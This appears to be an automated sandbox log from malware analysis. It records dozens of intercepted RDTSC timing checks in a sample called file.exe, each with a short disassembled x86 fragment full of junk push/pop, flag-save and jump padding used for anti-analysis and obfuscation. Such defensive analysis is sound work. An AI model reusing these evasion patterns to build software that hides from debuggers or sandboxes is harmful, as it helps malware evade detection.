Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF8543 second address: EF8562 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF8A8D second address: EF8A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF8A91 second address: EF8AC1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C98BA52B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007F8C98BA52B6h 0x00000011 jnp 00007F8C98BA52B6h 0x00000017 jmp 00007F8C98BA52C8h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF8E93 second address: EF8EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C99233277h 0x00000009 jo 00007F8C99233266h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF8EB5 second address: EF8EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF9FBF second address: EF9FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF9FC3 second address: EF9FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8C98BA52B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F8C98BA52BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF9FDA second address: EF9FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jl 00007F8C99233266h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F8C9923326Dh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF9FF5 second address: EFA00A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8C98BA52C7h 0x00000008 jmp 00007F8C98BA52BBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFE76A second address: EFE786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C99233278h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFE786 second address: EFE791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFE791 second address: EFE796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F02008 second address: F02020 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F8C98BA52C2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F02020 second address: F0202C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8C99233266h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0FF52 second address: F0FF7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F8C98BA52C1h 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F8C98BA52B6h 0x00000016 je 00007F8C98BA52B6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12FAA second address: F12FBA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007F8C99233266h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12FBA second address: F12FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C98BA52C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12CE1 second address: F12CEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F18514 second address: F18518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F23D56 second address: F23D79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8C99233278h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F23D79 second address: F23D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F26537 second address: F2653B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2653B second address: F26547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F26547 second address: F2654B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2AB05 second address: F2AB2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F8C98BA52C2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C98BA52BCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2AE49 second address: F2AE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2AE4F second address: F2AE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8C98BA52BEh 0x0000000c jmp 00007F8C98BA52BAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3AFAB second address: F3AFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3AFAF second address: F3AFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F8C98BA52B8h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3AFBF second address: F3AFC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A826 second address: F4A82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A82E second address: F4A84C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C99233274h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A84C second address: F4A869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C98BA52C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A869 second address: F4A8A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C9923326Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f jmp 00007F8C9923326Bh 0x00000014 jno 00007F8C99233266h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F8C99233272h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A8A6 second address: F4A8AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A6B0 second address: F4A6B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4D01B second address: F4D01F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4D01F second address: F4D027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F62904 second address: F6290A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6290A second address: F62918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F8C99233268h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F62E89 second address: F62EAC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C98BA52B6h 0x00000008 jc 00007F8C98BA52B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007F8C98BA52C7h 0x00000016 jmp 00007F8C98BA52BBh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F62EAC second address: F62EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F632CC second address: F632D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F632D1 second address: F632D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F632D7 second address: F632DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F67639 second address: F6763F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F67724 second address: F6772A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F67CA9 second address: F67CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C9923326Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD035F second address: 4CD03A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8C98BA52C0h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007F8C98BA52C7h 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD03A6 second address: 4CD0431 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8C99233279h 0x00000008 and cx, 6956h 0x0000000d jmp 00007F8C99233271h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F8C99233270h 0x0000001b or ecx, 445CDB78h 0x00000021 jmp 00007F8C9923326Bh 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 jmp 00007F8C99233276h 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 mov edi, esi 0x00000033 mov edx, esi 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F8C9923326Eh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0431 second address: 4CD0440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD048B second address: 4CD048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD048F second address: 4CD0495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD057A second address: 4CD05B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 83h 0x00000005 mov edx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f mov edi, 535059D6h 0x00000014 movsx edx, si 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F8C99233279h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD05B7 second address: 4CD05BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD05BB second address: 4CD05C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0672 second address: 4CD0679 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0713 second address: 4CD0719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0719 second address: 4CD078B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F8C98BA52BCh 0x00000015 adc esi, 254BB6E8h 0x0000001b jmp 00007F8C98BA52BBh 0x00000020 popfd 0x00000021 popad 0x00000022 dec edi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movzx esi, bx 0x00000029 pushfd 0x0000002a jmp 00007F8C98BA52C3h 0x0000002f xor cx, 9EDEh 0x00000034 jmp 00007F8C98BA52C9h 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD078B second address: 4CD0791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0791 second address: 4CD07A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ebx, dword ptr [edi+01h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD07A2 second address: 4CD07A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD07A6 second address: 4CD07AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD07AC second address: 4CD07C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 3Ch 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov al, byte ptr [edi+01h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8C9923326Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD07C8 second address: 4CD07F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edi 0x0000000a jmp 00007F8C98BA52BEh 0x0000000f test al, al 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD07F4 second address: 4CD07FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD07FA second address: 4CD084E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8C98BA52C2h 0x00000009 jmp 00007F8C98BA52C5h 0x0000000e popfd 0x0000000f mov ebx, eax 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jne 00007F8D08CBD50Ah 0x0000001a pushad 0x0000001b push ecx 0x0000001c movsx edx, ax 0x0000001f pop eax 0x00000020 movsx edi, si 0x00000023 popad 0x00000024 mov ecx, edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F8C98BA52BFh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD084E second address: 4CD08B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C99233279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 shr ecx, 02h 0x0000000c pushad 0x0000000d mov di, ax 0x00000010 call 00007F8C99233278h 0x00000015 pushfd 0x00000016 jmp 00007F8C99233272h 0x0000001b or cx, 2778h 0x00000020 jmp 00007F8C9923326Bh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 popad 0x00000028 rep movsd 0x0000002a rep movsd 0x0000002c rep movsd 0x0000002e rep movsd 0x00000030 rep movsd 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD08B7 second address: 4CD08BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD08BB second address: 4CD0916 instructions: 0x00000000 rdtsc 0x00000002 mov bx, BD54h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov al, bl 0x0000000a popad 0x0000000b mov ecx, edx 0x0000000d jmp 00007F8C99233274h 0x00000012 and ecx, 03h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F8C9923326Eh 0x0000001c sbb ch, 00000038h 0x0000001f jmp 00007F8C9923326Bh 0x00000024 popfd 0x00000025 mov esi, 6057D26Fh 0x0000002a popad 0x0000002b rep movsb 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F8C9923326Ch 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0916 second address: 4CD091C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD091C second address: 4CD092D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C9923326Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD092D second address: 4CD0A06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-04h], FFFFFFFEh 0x00000012 pushad 0x00000013 mov dh, ch 0x00000015 jmp 00007F8C98BA52C9h 0x0000001a popad 0x0000001b mov eax, ebx 0x0000001d pushad 0x0000001e pushad 0x0000001f mov esi, 0D4468E9h 0x00000024 popad 0x00000025 movsx edx, cx 0x00000028 popad 0x00000029 mov ecx, dword ptr [ebp-10h] 0x0000002c pushad 0x0000002d mov cx, di 0x00000030 popad 0x00000031 mov dword ptr fs:[00000000h], ecx 0x00000038 pushad 0x00000039 movsx edi, si 0x0000003c pushfd 0x0000003d jmp 00007F8C98BA52BAh 0x00000042 jmp 00007F8C98BA52C5h 0x00000047 popfd 0x00000048 popad 0x00000049 pop ecx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007F8C98BA52C3h 0x00000053 sbb cx, 74DEh 0x00000058 jmp 00007F8C98BA52C9h 0x0000005d popfd 0x0000005e pushfd 0x0000005f jmp 00007F8C98BA52C0h 0x00000064 adc esi, 693754D8h 0x0000006a jmp 00007F8C98BA52BBh 0x0000006f popfd 0x00000070 popad 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0A06 second address: 4CD0A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 4Bh 0x00000005 pushfd 0x00000006 jmp 00007F8C99233270h 0x0000000b or ah, 00000038h 0x0000000e jmp 00007F8C9923326Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop edi 0x00000018 pushad 0x00000019 call 00007F8C99233274h 0x0000001e mov ebx, esi 0x00000020 pop ecx 0x00000021 mov ecx, edx 0x00000023 popad 0x00000024 pop esi 0x00000025 jmp 00007F8C99233279h 0x0000002a pop ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov edx, 1961670Eh 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0A6F second address: 4CD0A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0A74 second address: 4CD057A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C99233272h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushfd 0x0000000d jmp 00007F8C9923326Dh 0x00000012 or ecx, 1771B346h 0x00000018 jmp 00007F8C99233271h 0x0000001d popfd 0x0000001e pop ecx 0x0000001f mov ecx, ebx 0x00000021 popad 0x00000022 retn 0008h 0x00000025 cmp dword ptr [ebp-2Ch], 10h 0x00000029 mov eax, dword ptr [ebp-40h] 0x0000002c jnc 00007F8C99233265h 0x0000002e push eax 0x0000002f lea edx, dword ptr [ebp-00000590h] 0x00000035 push edx 0x00000036 call esi 0x00000038 push 00000008h 0x0000003a jmp 00007F8C99233276h 0x0000003f call 00007F8C99233269h 0x00000044 pushad 0x00000045 jmp 00007F8C9923326Eh 0x0000004a call 00007F8C99233272h 0x0000004f pushad 0x00000050 popad 0x00000051 pop ecx 0x00000052 popad 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 mov dx, 82EEh 0x0000005b pushfd 0x0000005c jmp 00007F8C9923326Fh 0x00000061 xor eax, 05D8839Eh 0x00000067 jmp 00007F8C99233279h 0x0000006c popfd 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0B73 second address: 4CD0B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0B77 second address: 4CD0B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0B7D second address: 4CD0B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ch 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0B8E second address: 4CD0B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0B92 second address: 4CD0B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0B98 second address: 4CD0B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0B9E second address: 4CD0BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F8C98BA52C0h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8C98BA52BAh 0x0000001e rdtsc
